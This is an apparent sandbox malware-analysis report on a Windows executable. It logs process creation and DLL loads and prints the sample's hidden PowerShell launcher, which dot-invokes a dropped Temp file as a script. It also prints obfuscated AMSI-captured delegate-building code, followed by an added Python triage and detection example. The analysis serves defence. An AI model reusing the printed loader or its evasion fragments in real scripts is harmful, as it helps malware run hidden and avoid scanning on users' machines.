Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown (109 identical entries)
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: wintypes.dll (3 entries)
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: vfhlZ0vrbe.exe | Static file information: File size 1366152 > 1048576
Source: vfhlZ0vrbe.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Fasciculately $Pragtfulde $Eksekutivmagtens), (Tryptamine @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Daphnioid = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dramatize)), $Hippiater).DefineDynamicModule($Lemniscus, $false).DefineType($Watercresses, $Blodhundes, [System.MulticastDelegate])$Pa
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exe | File created: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dll
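The launcher recorded above reads the dropped .Heg file as one string, takes the three characters at offset 12754 as a cmdlet name, and dot-invokes that cmdlet with the whole file as its argument, so the file is at once the lookup table for the command and the script that command runs. The following Python is an added triage example, not part of the Joe Sandbox report and not the sample's own code: it parses that command line, reproduces the SubString step against a constructed stand-in for beccabunga.Heg (the real file content is not on this page, and the token "iex" placed in the stand-in is an assumption about what such loaders store there), and lists the indicators a detection rule can key on, all without invoking anything.

```python
"""Static triage for the PowerShell launcher pattern in this report:

    $buf = gc -raw '<file>'; $cmd = $buf.SubString(<offset>,3); .$cmd($buf)

Added example, not Joe Sandbox output. The stage file built below is
CONSTRUCTED; the real beccabunga.Heg is not on the page, and the token
'iex' is an assumption about what the loader resolves at that offset.
"""
import re

# Command line exactly as recorded in the report for PID 3460.
REPORT_CMDLINE = (
    'powershell.exe -windowstyle hidden "$Lotteris=gc -raw '
    "'C:\\Users\\user\\AppData\\Local\\Temp\\Gutturotetany\\dearth\\beccabunga.Heg';"
    '$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "'
)

# Matches the three-statement launcher and ties the variable names together
# with backreferences, so unrelated uses of gc/SubString do not match.
LAUNCHER_RE = re.compile(
    r"\$(?P<buf>\w+)\s*=\s*gc\s+-raw\s+'(?P<path>[^']+)'\s*;\s*"
    r"\$(?P<cmd>\w+)\s*=\s*\$(?P=buf)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;\s*"
    r"\.\$(?P=cmd)\(\$(?P=buf)\)",
    re.IGNORECASE,
)


def parse_launcher(cmdline):
    """Return the loader's parameters, or None if the command line does not fit."""
    m = LAUNCHER_RE.search(cmdline)
    if not m:
        return None
    return {
        "path": m["path"],
        "offset": int(m["off"]),
        "length": int(m["len"]),
        "hidden": "-windowstyle hidden" in cmdline.lower(),
        "in_temp": "\\appdata\\local\\temp\\" in m["path"].lower(),
    }


def resolve_token(stage_text, offset, length):
    """What the loader's SubString call yields: the cmdlet name it will dot-invoke.
    SubString indexes characters of the decoded text, so decode before slicing."""
    return stage_text[offset:offset + length]


def build_stage(offset=12754, token="iex"):
    """Constructed stand-in for beccabunga.Heg: comment padding up to `offset`,
    the token, then a visible payload. Keeping the token inside a comment is
    what lets one text serve as both the SubString source and a valid script."""
    pad = ("# pad\n" * (offset // 6 + 1))[:offset]
    payload = "\nWrite-Output 'stage two would run here'\n"
    return pad + token + payload


def triage(cmdline, stage_text):
    """Reproduce the launcher up to, but not including, the invocation."""
    p = parse_launcher(cmdline)
    if p is None:
        return None
    token = resolve_token(stage_text, p["offset"], p["length"])
    return {
        "token": token,
        "script_chars": len(stage_text),
        "payload_preview": stage_text[p["offset"] + p["length"]:].strip()[:60],
    }


def indicators(cmdline):
    """Detection view: each string is one reason to alert on this command line."""
    hits = []
    p = parse_launcher(cmdline)
    if p is None:
        return hits
    hits.append("cmdlet name resolved at runtime via SubString on file content")
    hits.append("file content dot-invoked as a command argument (.$var($var))")
    if p["hidden"]:
        hits.append("-windowstyle hidden")
    if p["in_temp"]:
        hits.append("script staged under %LOCALAPPDATA%\\Temp")
    ext = p["path"].rsplit(".", 1)[-1]
    if ext.lower() not in ("ps1", "psm1"):
        hits.append("non-PowerShell extension: ." + ext)
    return hits


if __name__ == "__main__":
    stage = build_stage()
    print(triage(REPORT_CMDLINE, stage))
    for hit in indicators(REPORT_CMDLINE):
        print(" -", hit)
```

Run against a real dropped file, replace `build_stage()` with the decoded content of the .Heg file; the offset and length come from the command line, so the same function recovers the token for any sample using this launcher shape. Note that the AMSI entries above (GetDelegateForFunctionPointer, DefineDynamicAssembly, DefineType with MulticastDelegate) describe what the invoked script does next, which this static step deliberately never reaches.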

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 entries)
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
